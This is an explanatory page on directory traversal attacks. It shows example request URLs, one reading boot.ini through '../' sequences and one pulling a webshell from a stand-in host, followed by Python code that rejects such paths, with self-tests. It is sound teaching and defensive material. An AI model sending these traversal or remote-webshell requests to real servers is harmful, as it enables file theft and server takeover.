    Directory Traversal

    Directory traversal, sometimes called path traversal, is when an attacker attempts to access files outside of the main web root directory. When a server is vulnerable to directory traversal, it can give the attacker broad access to the server: not only the ability to read the contents of files, but also potentially to run arbitrary commands, depending on what they can access.

    Basic Example

    http://vulnerable_site.com/get_file.asp?file=file.pdf

    If vulnerable_site.com were affected by directory traversal, and let's say the attacker wanted the boot.ini file in C:\, they could then theoretically request:

    http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini

    This becomes much more dangerous when the attacker is able to access binaries that can run code, or files that come from outside sources.

    http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp
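
    The server-side check that blocks both request shapes above, as an added example in Python (not code from this page or from any real get_file.asp). The function name, the "downloads" directory and the sample tree are assumptions constructed for the illustration.

```python
import tempfile
from pathlib import Path

class RejectedPath(ValueError):
    """The requested name does not map to a file inside the download directory."""

def resolve_download(base_dir, requested):
    """Return the real path for the `file` parameter, or raise RejectedPath."""
    base = Path(base_dir).resolve()
    # Remote locations (http://host/x, //host/x, \\host\share\x) are never local files.
    if "://" in requested or requested.startswith(("//", "\\\\")):
        raise RejectedPath("remote location")
    if "\x00" in requested:
        raise RejectedPath("NUL byte")
    # Treat backslashes as separators so Windows-style input is checked on any OS.
    relative = requested.replace("\\", "/")
    # Collapse "..", "." and symlinks first, then test containment on the result.
    candidate = (base / relative).resolve()
    if base not in candidate.parents:
        raise RejectedPath("outside download directory")
    if not candidate.is_file():
        raise RejectedPath("no such file")
    return candidate

def check_samples():
    """Run constructed inputs against a throwaway directory tree."""
    samples = ["file.pdf", "./file.pdf", "../../../../boot.ini", "..\\boot.ini",
               "http://bad_guy/webshell.asp"]
    outcomes = {}
    with tempfile.TemporaryDirectory() as root:
        webroot = Path(root) / "downloads"  # assumed download directory
        webroot.mkdir()
        (webroot / "file.pdf").write_text("constructed sample")
        (Path(root) / "boot.ini").write_text("constructed file outside the base")
        for value in samples:
            try:
                resolve_download(webroot, value)
                outcomes[value] = "served"
            except RejectedPath as reason:
                outcomes[value] = f"rejected: {reason}"
    return outcomes

if __name__ == "__main__":
    for value, outcome in check_samples().items():
        print(f"{value!r:35} {outcome}")
```

    The containment test runs on the fully resolved path, so it does not depend on filtering "../" strings out of the input.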